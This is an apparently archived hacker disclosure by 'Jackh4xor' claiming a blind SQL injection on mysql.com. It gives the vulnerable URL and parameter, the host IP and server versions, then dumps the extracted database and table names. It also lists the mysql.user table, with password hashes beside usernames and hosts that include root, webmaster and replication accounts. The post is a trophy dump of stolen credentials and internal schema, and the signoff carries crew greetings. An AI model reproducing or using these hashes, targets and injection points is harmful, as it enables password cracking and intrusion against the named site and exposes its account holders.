MySQL.com suffered from a remote blind SQL injection vulnerability.
c12cb947f8d7991ebab12da7bd232f56b1ba2144aa99196a42cfff37298a17fb---------------------------------------------------------------------------------------
[+] MySQL.com Vulnerable To Blind SQL Injection vulnerability
[+] Author: Jackh4xor @ w4ck1ng
[+] Site: http://www.jackh4xor.com
---------------------------------------------------------------------------------------
About MySQL.com :
--------------------------------------------------------------------------------------------------------------------
The Mysql website offers database software, services and support for your business, including the Enterprise server, the Network monitoring and advisory services and the production support. The wide range of products include: Mysql clusters, embedded database, drivers for JDBC, ODBC and Net, visual database tools (query browser, migration toolkit) and last but not least the MaxDB- the open source database certified for SAP/R3. The Mysql services are also made available for you. Choose among the Mysql training for database solutions, Mysql certification for the Developers and DBAs, Mysql consulting and support. It makes no difference if you are new in the database technology or a skilled developer of DBA, Mysql proposes services of all sorts for their customers.
--------------------------------------------------------------------------------------------------------------------
Vulnerable Target : http://mysql.com/customers/view/index.html?id=1170
Host IP : 213.136.52.29
Web Server : Apache/2.2.15 (Fedora)
Powered-by : PHP/5.2.13
Injection Type : MySQL Blind
Current DB : web
lead_routing_rule
lead_rep
lead_old
lead_note
lead_extra_old
lead_extra_new
lead_extra
lead_companies
lead_campaign_member
lead
language_strings
language_modules
imagecache
hall_of_fame
g_search_term
g_search_data
g_blog_data
forum_comment
forms
field_xref
field_options
field_match
email_blacklist
email_a_friend
drpl_manual_review
drpl_denied
drpl_check_log
drpl_cache
customer_meta_sets
customer_meta_set
customer_meta
customer
coupon_product
coupon_campaign_attribute
coupon_campaign
coupon
country
countries
campaign_type
campaign_topic
campaign_score
campaign_listdata
campaign_detail
business
bounces
Database : mysql
Table:
user_info
user Column: Update_pri Insert_priv Select_priv Password User Host
time_zone_transition_type
time_zone_transition
time_zone_name
time_zone_leap_second
time_zone
tables_priv
slow_log
?ervers
procs_priv
proc
plugin
ndb_binlog_index
inventory
host
help_topic
help_relation
help_keyword
help_category
general_log
func
event
db
columns_priv
# mysql.user Data
Password User Host
wembaster %
monitor 10.%
sys %
sys localhost
*06581D0A5474DFF4D5DA3CE0CD7702FA52601412 forumread %
*0702AEBF8E92A002E95D40247776E1A67CD2CA3F wb %
*2A57F767D29295B3CB8D01C760D9939649483F85 flipper 10.%
*32F623705BFFFE682E7BD18D5357B38EF8A5BAA9 wordpress %
*66A905D4110DF14B41D585FDBCE0666AD13DD8C1 nagios %
*704EB56151317F27573BB4DDA98EDF00FFABAAF8 root localhost
*ED1BDC19B08FD41017EE180169E5CEB2C77F941A mysqlforge %
*FD75B177FFEC3590FE5D7E8459B3DDC60AE8147B webleads 10.%
00680dd718880337 olof %
077f61a849269b62 qa_r %
077f61a849269b62 qa_rw %
077f61a849269b62 qa_adm %
0c2f46ba6b87d4ea trials_admin 10.%
1856b9b03b5a6f47 cacti %
19519e95545509b5 certification %
1a39dcad63bbc7a6 gf_mschiff %
2277fd7d562ec459 webslave localhost
2277fd7d562ec459 webslave %
304404b114b5516c planetmysql_rw %
35e376451a87adb0 planetmysql_ro %
4e203d581b756a93 webmaster localhost
4e203d581b756a93 webmaster %
4e93479179a8ec93 sysadm %
575ec47e16c7e20e phorum5 %
575ec47e16c7e20e lenz %
5f340ec40a706f64 robin %
61113da02d2c97a5 regdata %
616075f256f111ba myadmin 10.100.6.44
61711eea3de509ac merlin 127.0.0.1
6302de0909a369a1 ebraswell %
6b72b2824cc7f6fe mysqlweb %
6ffd2b17498cdd44 zack %
70599cf351c6f591 repl %
740284817e3ed5a8 webwiki %
74c5529b41a97cc2 web_projects
Databsae: web_control
Table:
system
system_command
service_request
run_control
request_daemon
rebuild_server
rebuild_queue
rebuild_control
quarterly_lead_report
newsletter_log
newsletter_control
ips
hosts Columns:notes description name
dns_servers Columns: name internal ip
Database: certification
Tables:
signup
corpcustomers
certexamdata
certcandidatedata
certaccess
Database: wordpress
Tables:
wp_4_term_taxonom
wp_4_term_relationships
wp_4_posts
wp_4_postmeta
wp_4_options
wp_4_links
wp_4_comments
wp_3_terms
wp_3_term_taxonomy
wp_3_term_relationships
wp_3_posts
wp_3_postmeta
wp_3_options
wp_3_links
wp_3_comments
wp_2_terms
wp_2_term_taxonomy
wp_2_term_relationships
wp_2_posts
wp_2_postmeta
wp_2_options
wp_2_links
wp_2_comments
wp_1_terms
wp_1_term_taxonomy
wp_1_term_relationships
wp_1_posts
wp_1_postmeta
wp_1_options
wp_1_links
wp_1_comments
wp_11_terms
wp_11_term_taxonomy
wp_11_term_relationships
wp_11_posts
wp_11_postmeta
wp_11_options
wp_11_links
wp_11_comments
wp_10_terms
wp_10_term_taxonomy
wp_10_term_relationships
wp_10_posts
wp_10_postmeta
wp_10_options
wp_10_links
wp_10_comments
remove_queries
Database: bk
Table:
wp_backupterm_taxonomy
wp_backupterm_relationships
wp_backupposts
wp_backuppostmeta
wp_backupoptions
wp_backuplinks
wp_backupcomments
-----------------------------------------------------------------------------------
Signed : Jackh4xor !
Greetz : rooto, Mr.52, zone-hacker, w4ck1ng
(In)Security
-------------------------------------------------------------------------------------
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed